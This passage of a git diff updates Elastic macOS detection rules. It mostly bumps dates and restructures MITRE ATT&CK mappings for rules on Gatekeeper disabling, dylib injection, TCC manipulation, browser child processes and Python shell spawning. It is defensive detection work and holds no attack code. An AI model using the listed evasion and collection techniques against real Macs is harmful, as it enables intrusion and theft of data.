macOS, files downloaded from the internet are tagged with a quarantine attrib [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1553" +name = "Subvert Trust Controls" +reference = "https://attack.mitre.org/techniques/T1553/" + +[[rule.threat.technique.subtechnique]] +id = "T1553.001" +name = "Gatekeeper Bypass" +reference = "https://attack.mitre.org/techniques/T1553/001/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml b/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml index d56533056a0..c5a7587ca5d 100644 --- a/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml +++ b/rules/macos/defense_evasion_attempt_to_disable_gatekeeper.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/11" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -102,14 +102,18 @@ Gatekeeper is a macOS security feature that ensures only trusted software runs b [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1553" name = "Subvert Trust Controls" reference = "https://attack.mitre.org/techniques/T1553/" +[[rule.threat.technique.subtechnique]] +id = "T1553.001" +name = "Gatekeeper Bypass" +reference = "https://attack.mitre.org/techniques/T1553/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/macos/defense_evasion_dylib_injection_via_env_vars.toml b/rules/macos/defense_evasion_dylib_injection_via_env_vars.toml index 65c5732f957..115d5925383 100644 --- a/rules/macos/defense_evasion_dylib_injection_via_env_vars.toml +++ b/rules/macos/defense_evasion_dylib_injection_via_env_vars.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -89,35 +89,53 @@ sequence by process.entity_id with maxspan=15s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Defense Evasion" - id = "TA0005" - reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" - [[rule.threat.technique]] - name = "Hijack Execution Flow" - id = "T1574" - reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" - [[rule.threat.technique.subtechnique]] - name = "Dynamic Linker Hijacking" - id = "T1574.006" - reference = "https://attack.mitre.org/techniques/T1574/006/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Persistence" - id = "TA0003" - reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" - [[rule.threat.technique]] - name = "Hijack Execution Flow" - id = "T1574" - reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" - [[rule.threat.technique.subtechnique]] - name = "Dynamic Linker Hijacking" - id = "T1574.006" - reference = "https://attack.mitre.org/techniques/T1574/006/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/macos/defense_evasion_gatekeeper_override_and_execution.toml b/rules/macos/defense_evasion_gatekeeper_override_and_execution.toml index 026222507de..4293e385f82 100644 --- a/rules/macos/defense_evasion_gatekeeper_override_and_execution.toml +++ b/rules/macos/defense_evasion_gatekeeper_override_and_execution.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/03" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -76,27 +76,45 @@ configuration where host.os.type == "macos" and event.action == "gatekeeper_over [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Defense Evasion" - id = "TA0005" - reference = "https://attack.mitre.org/tactics/TA0005/" - - [[rule.threat.technique]] - name = "Impair Defenses" - id = "T1562" - reference = "https://attack.mitre.org/techniques/T1562/" - - [[rule.threat.technique.subtechnique]] - name = "Disable or Modify Tools" - id = "T1562.001" - reference = "https://attack.mitre.org/techniques/T1562/001/" - - [[rule.threat.technique]] - name = "Subvert Trust Controls" - id = "T1553" - reference = "https://attack.mitre.org/techniques/T1553/" - - [[rule.threat.technique.subtechnique]] - name = "Gatekeeper Bypass" - id = "T1553.001" - reference = "https://attack.mitre.org/techniques/T1553/001/" +[[rule.threat.technique]] +id = "T1553" +name = "Subvert Trust Controls" +reference = "https://attack.mitre.org/techniques/T1553/" + +[[rule.threat.technique.subtechnique]] +id = "T1553.001" +name = "Gatekeeper Bypass" +reference = "https://attack.mitre.org/techniques/T1553/001/" + +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/macos/defense_evasion_modify_environment_launchctl.toml b/rules/macos/defense_evasion_modify_environment_launchctl.toml index cc25b452be3..72328ff7eeb 100644 --- a/rules/macos/defense_evasion_modify_environment_launchctl.toml +++ b/rules/macos/defense_evasion_modify_environment_launchctl.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/14" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -102,19 +102,23 @@ Environment variables in macOS are crucial for configuring system and applicatio [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + [[rule.threat.technique.subtechnique]] id = "T1574.007" name = "Path Interception by PATH Environment Variable" reference = "https://attack.mitre.org/techniques/T1574/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml b/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml index 142f83f0d06..e6df1d7b6bc 100644 --- a/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml +++ b/rules/macos/defense_evasion_privacy_controls_tcc_database_modification.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/23" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -104,19 +104,28 @@ The Transparency, Consent, and Control (TCC) database in macOS manages app permi [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.006" +name = "TCC Manipulation" +reference = "https://attack.mitre.org/techniques/T1548/006/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/macos/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml b/rules/macos/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml index edcdf2e9347..cd78d6ab68b 100644 --- a/rules/macos/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml +++ b/rules/macos/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/11" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -105,26 +105,39 @@ Secure Copy Protocol (SCP) is used for secure file transfers over SSH. On macOS, [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/macos/defense_evasion_safari_config_change.toml b/rules/macos/defense_evasion_safari_config_change.toml index 4a35cd07257..10e852e4536 100644 --- a/rules/macos/defense_evasion_safari_config_change.toml +++ b/rules/macos/defense_evasion_safari_config_change.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/14" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -100,19 +100,23 @@ The 'defaults' command in macOS is a utility that allows users to read, write, a [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - +[[rule.threat.technique]] +id = "T1647" +name = "Plist File Modification" +reference = "https://attack.mitre.org/techniques/T1647/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/macos/defense_evasion_sandboxed_office_app_suspicious_zip_file.toml b/rules/macos/defense_evasion_sandboxed_office_app_suspicious_zip_file.toml index 308e0584ee7..7ba87ae52c0 100644 --- a/rules/macos/defense_evasion_sandboxed_office_app_suspicious_zip_file.toml +++ b/rules/macos/defense_evasion_sandboxed_office_app_suspicious_zip_file.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/11" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -101,14 +101,23 @@ Microsoft Office applications on macOS operate within a sandbox to limit potenti [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" + [[rule.threat.technique]] id = "T1497" name = "Virtualization/Sandbox Evasion" reference = "https://attack.mitre.org/techniques/T1497/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/macos/defense_evasion_suspicious_tcc_access_granted.toml b/rules/macos/defense_evasion_suspicious_tcc_access_granted.toml index 03d0581f379..70b84cd9768 100644 --- a/rules/macos/defense_evasion_suspicious_tcc_access_granted.toml +++ b/rules/macos/defense_evasion_suspicious_tcc_access_granted.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/03" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -85,30 +85,48 @@ FROM logs-endpoint.events.* [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Defense Evasion" - id = "TA0005" - reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" - [[rule.threat.technique]] - name = "Abuse Elevation Control Mechanism" - id = "T1548" - reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique.subtechnique]] +id = "T1548.006" +name = "TCC Manipulation" +reference = "https://attack.mitre.org/techniques/T1548/006/" - [[rule.threat.technique.subtechnique]] - name = "TCC Manipulation" - id = "T1548.006" - reference = "https://attack.mitre.org/techniques/T1548/006/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Collection" - id = "TA0009" - reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" - [[rule.threat.technique]] - name = "Data from Local System" - id = "T1005" - reference = "https://attack.mitre.org/techniques/T1005/" +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.006" +name = "TCC Manipulation" +reference = "https://attack.mitre.org/techniques/T1548/006/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/macos/defense_evasion_tcc_bypass_mounted_apfs_access.toml b/rules/macos/defense_evasion_tcc_bypass_mounted_apfs_access.toml index 78f98ad6975..bb9e3a4e69b 100644 --- a/rules/macos/defense_evasion_tcc_bypass_mounted_apfs_access.toml +++ b/rules/macos/defense_evasion_tcc_bypass_mounted_apfs_access.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/04" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -98,14 +98,26 @@ Apple's TCC framework safeguards user data by controlling app access to sensitiv [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1006" name = "Direct Volume Access" reference = "https://attack.mitre.org/techniques/T1006/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/macos/discovery_full_disk_access_check.toml b/rules/macos/discovery_full_disk_access_check.toml index 58b259b52dd..1bd5142d126 100644 --- a/rules/macos/discovery_full_disk_access_check.toml +++ b/rules/macos/discovery_full_disk_access_check.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -72,30 +72,48 @@ file where host.os.type == "macos" and event.action == "open" and [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Discovery" - id = "TA0007" - reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" - [[rule.threat.technique]] - name = "File and Directory Discovery" - id = "T1083" - reference = "https://attack.mitre.org/techniques/T1083/" +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Defense Evasion" - id = "TA0005" - reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" - [[rule.threat.technique]] - name = "Abuse Elevation Control Mechanism" - id = "T1548" - reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique.subtechnique]] +id = "T1548.006" +name = "TCC Manipulation" +reference = "https://attack.mitre.org/techniques/T1548/006/" - [[rule.threat.technique.subtechnique]] - name = "TCC Manipulation" - id = "T1548.006" - reference = "https://attack.mitre.org/techniques/T1548/006/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.006" +name = "TCC Manipulation" +reference = "https://attack.mitre.org/techniques/T1548/006/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/macos/discovery_suspicious_sip_check.toml b/rules/macos/discovery_suspicious_sip_check.toml index cf48e7fe8b7..19b49d3f620 100644 --- a/rules/macos/discovery_suspicious_sip_check.toml +++ b/rules/macos/discovery_suspicious_sip_check.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -74,22 +74,40 @@ process where host.os.type == "macos" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Discovery" - id = "TA0007" - reference = "https://attack.mitre.org/tactics/TA0007/" - - [[rule.threat.technique]] - name = "System Information Discovery" - id = "T1082" - reference = "https://attack.mitre.org/techniques/T1082/" - - [[rule.threat.technique]] - name = "Virtualization/Sandbox Evasion" - id = "T1497" - reference = "https://attack.mitre.org/techniques/T1497/" - - [[rule.threat.technique.subtechnique]] - name = "System Checks" - id = "T1497.001" - reference = "https://attack.mitre.org/techniques/T1497/001/" +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + +[[rule.threat.technique]] +id = "T1497" +name = "Virtualization/Sandbox Evasion" +reference = "https://attack.mitre.org/techniques/T1497/" + +[[rule.threat.technique.subtechnique]] +id = "T1497.001" +name = "System Checks" +reference = "https://attack.mitre.org/techniques/T1497/001/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1497" +name = "Virtualization/Sandbox Evasion" +reference = "https://attack.mitre.org/techniques/T1497/" + +[[rule.threat.technique.subtechnique]] +id = "T1497.001" +name = "System Checks" +reference = "https://attack.mitre.org/techniques/T1497/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/macos/discovery_system_and_network_configuration_check.toml b/rules/macos/discovery_system_and_network_configuration_check.toml index 05dfd0e7ded..4e55e3ad844 100644 --- a/rules/macos/discovery_system_and_network_configuration_check.toml +++ b/rules/macos/discovery_system_and_network_configuration_check.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -71,17 +71,17 @@ file where host.os.type == "macos" and event.action == "open" and [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Discovery" - id = "TA0007" - reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" - [[rule.threat.technique]] - name = "System Information Discovery" - id = "T1082" - reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" - [[rule.threat.technique]] - name = "System Network Configuration Discovery" - id = "T1016" - reference = "https://attack.mitre.org/techniques/T1016/" +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/macos/discovery_users_domain_built_in_commands.toml b/rules/macos/discovery_users_domain_built_in_commands.toml index 6720bc025b4..d8b8d169b92 100644 --- a/rules/macos/discovery_users_domain_built_in_commands.toml +++ b/rules/macos/discovery_users_domain_built_in_commands.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/12" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -105,29 +105,38 @@ Built-in macOS commands like `ldapsearch`, `dsmemberutil`, and `dscl` are essent [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" + [[rule.threat.technique.subtechnique]] id = "T1069.001" name = "Local Groups" reference = "https://attack.mitre.org/techniques/T1069/001/" +[[rule.threat.technique.subtechnique]] +id = "T1069.002" +name = "Domain Groups" +reference = "https://attack.mitre.org/techniques/T1069/002/" [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" + [[rule.threat.technique.subtechnique]] id = "T1087.001" name = "Local Account" reference = "https://attack.mitre.org/techniques/T1087/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1087.002" +name = "Domain Account" +reference = "https://attack.mitre.org/techniques/T1087/002/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/macos/execution_defense_evasion_electron_app_childproc_node_js.toml b/rules/macos/execution_defense_evasion_electron_app_childproc_node_js.toml index 6ec5857b809..6ac080940fa 100644 --- a/rules/macos/execution_defense_evasion_electron_app_childproc_node_js.toml +++ b/rules/macos/execution_defense_evasion_electron_app_childproc_node_js.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -103,26 +103,31 @@ Electron applications, built on Node.js, can execute child processes using the ` [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/macos/execution_initial_access_suspicious_browser_childproc.toml b/rules/macos/execution_initial_access_suspicious_browser_childproc.toml index 3280689d092..e15e1221599 100644 --- a/rules/macos/execution_initial_access_suspicious_browser_childproc.toml +++ b/rules/macos/execution_initial_access_suspicious_browser_childproc.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/23" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -106,26 +106,64 @@ Web browsers are integral to user interaction with the internet, often serving a [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1189" name = "Drive-by Compromise" reference = "https://attack.mitre.org/techniques/T1189/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/macos/execution_installer_package_spawned_network_event.toml b/rules/macos/execution_installer_package_spawned_network_event.toml index f54b8347f48..3b70f10fc01 100644 --- a/rules/macos/execution_installer_package_spawned_network_event.toml +++ b/rules/macos/execution_installer_package_spawned_network_event.toml @@ -2,7 +2,7 @@ creation_date = "2021/02/23" integration = ["endpoint"] maturity = "production" -updated_date = "2025/04/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -112,36 +112,56 @@ MacOS installer packages, often with a .pkg extension, are used to distribute so [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + [[rule.threat.technique.subtechnique]] id = "T1059.007" name = "JavaScript" reference = "https://attack.mitre.org/techniques/T1059/007/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" + [[rule.threat.technique.subtechnique]] id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" - +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/macos/execution_python_shell_spawn_first_occurrence.toml b/rules/macos/execution_python_shell_spawn_first_occurrence.toml index 6da50e09b03..1e674eb9dd0 100644 --- a/rules/macos/execution_python_shell_spawn_first_occurrence.toml +++ b/rules/macos/execution_python_shell_spawn_first_occurrence.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/23" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -76,10 +76,17 @@ not process.command_line:(*pip* or *conda* or *brew* or *jupyter*) [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [[rule.threat.technique.subtechnique]] id = "T1059.006" name = "Python" @@ -89,7 +96,6 @@ reference = "https://attack.mitre.org/techniques/T1059/006/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.parent.executable"] diff --git a/rules/macos/execution_script_via_automator_workflows.toml b/rules/macos/execution_script_via_automator_workflows.toml index a5320a95420..e0a473b5ca8 100644 --- a/rules/macos/execution_script_via_automator_workflows.toml +++ b/rules/macos/execution_script_via_automator_workflows.toml @@ -2,7 +2,7 @@ creation_date = 